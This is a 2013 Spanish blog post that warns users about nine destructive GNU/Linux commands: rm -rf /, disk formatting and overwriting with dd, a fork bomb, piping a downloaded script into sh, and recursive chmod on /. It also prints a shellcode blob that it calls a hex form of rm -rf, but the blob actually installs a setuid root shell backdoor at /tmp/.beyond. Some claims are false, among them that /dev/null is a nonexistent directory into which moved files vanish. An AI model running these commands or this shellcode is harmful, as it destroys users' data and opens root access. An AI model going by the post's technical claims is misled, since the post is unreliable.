jueves, 9 de mayo de 2013

9 Comandos peligrosos de GNU/Linux que deben conocer

 
Todos los que conocemos GNU/Linux sabemos que con la cuenta de root podemos hacer muchas maravillas así como grandes desastres, y es por eso que muchas distribuciones limitan el acceso a esta cuenta o incorporan shells adicionales para modificar cambios peligrosos en el sistema.
Existe una serie de comandos que han ganado fama por su capacidad de daño:

1) Eliminar casi todo
rm -rf /
Al ejecutar este comando se borraran casi todos los archivos de sistema(salvo los archivos de procesos en la carpeta /proc
versión hexadecimal:
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
“x6ex2fx73x68x00x2dx63x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
2)Formateo del sistema
mkfs.ext3 /dev/sda
Formatea el disco o dispositivo sda , con la desaparición de todos los archivos presentes en él

3) Bomba Fork
Una bomba fork es una forma de ataque del tipo DoS (causa que un servicio o recurso sea inaccesible a los usuarios) que implementa la operación fork (creación de una copia de sí mismo), o alguna funcionalidad equivalente mediante la cual un proceso es capaz de crear otro proceso.

Resumiendo, una bomba fork es un proceso que se copia a si mismo muchas veces para colapsar tu sistema. Y aclarando falsos mitos, no es una bomba lógica, ni tampoco un fallo del kernel, ni mucho menos se trata de algo liberado por uno de los programadores del kernel.

Aunque puede tener varias, como por ejemplo:
ubunteate(){ ubunteate|ubunteate& };ubunteate
Pero tal cosa podemos prevenirla, editando el archivo adecuado:
$ sudo gedit /etc/security/limits.conf
Ahora localizaremos, al final del archivo, la siguiente línea:
# End of file
Pues justo encima de esa, podemos introducir la siguiente línea:
* hard nproc 1000
Quedando así las dos últimas líneas del archivo:
* hard nproc 1000
# End of file
Guardamos y cerramos el archivo y listo.

4) Colapsar el Sistema de Archivos
Si ejecutamos:
# cualquier-comando > /dev/sda
Como por ejemplo:
# ls > /dev/sda
Con este comando, se envían bloques de datos al dispositivo
indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.

5) Ejecutar un script de forma automática
En algunos foros linuxeros nos dicen que descarguemos un script con el siguiente código:
$ wget http://web.com/script.sh O | sh
O peor aún, como root:
# wget http://web.com/script.sh O | sh
Lo que hace este comando es descargar y ejecutar inmediatemente el script. Imaginense si uno de esos scripts contiene uno de los comandos que explico acá uds. tendrían su sistema GNU/Linux, MacosX o cualquier derivado de UNIX ya destruído. Recomiendo sólo descargar el código y examinarlo antes de ejecutarlo y obtenerlo sólo de fuentes confiables.
 
6)Mover un archivo
EL comando mv sirve para cambiar la ubicación de un archivo
$ mv directorio-o-archivo-a-mover directorio-al-que-mover
Como por ejemplo:
$ mv ~/script.sh ~/Documentos
Pero debes evitar que el directorio destino sea /dev/null, pues es un directorio inexistente, y jamás podrás obtener de nuevo esos archivos, por ejemplo:
$ mv ~/script.sh /dev/null
Eso hará desaparecer para siempre el script. Pero aún es peor si ejecutas, por ejemplo:
$ mv ~ /dev/null
Lo cual eliminará para siempre tu carpeta de usuario, con tus imágenes, vídeos, música, documentos, etc. Podemos comprobar la no existencia de ese directorio, vayamos primero al directorio /dev, el cual, supuestamente aloja null.:
$ cd /dev
Lo cual no genera ningún problema, y vamos a buscar ahora null:
$ ls
Lista demasiado grande para ponerse a buscar, mejor facilitarnos la vida:
$ ls | grep null
Si nos devuelve null, que lo hará, es que existe, pero eso no nos confirma que sea una carpeta, para ello utilizaremos:
$ ls -d
Que solo nos mostrará las carpetas, aunque también podemos filtrarlo por la palabra null:
$ ls -d | grep null
Y no les devolverá nada, porque no ha encontrado null como carpeta. Aún puedes probar:
$ cd null
Y nos dirá que no es un directorio. Por lo tanto, fijarse bien cuando se mueva algo.

7) Rellenar el Disco Duro
También disponemos de un comando en Linux:
# dd if=/dev/urandom of=/dev/sda
Que simplemente rellena con datos aleatorios todo el espacio vacío en el disco duro, lo cual, como podemos imaginar, genera un caos tremendo en el sistema.

8 ) Te doy permiso para lo que quieras
También debemos de tener cuidado a la hora de dar permisos a los directorios y a las carpetas, como por ejemplo:
# chmod -R 777 /
Este comando da permisos totales a todos los directorios del sistema, ya que el comando chmod es el encargado de dar permisos, la opción R da permiso a todo lo contenido en el directorio, 777 es el mayor permiso posible, realmente inseguro y, la barrita, como dijimos anteriormente, es todo el sistema. Esto daría permiso a cualquier agente de hacer lo que sea con tu sistema, cuidado con el trío de los 7 y dónde los aplicas.

9) Te quito todos los permisos
# chmod -R -777 /
Este comando es el inverso del anterior , quita todos los permisos a todos los usuarios y al ejecutarlo lo que tendrán será un hermoso signo “>” como shell y no podrán realizar nada.


 Enviado por: pucci96

No hay comentarios:

Publicar un comentario

Dejar Comentarios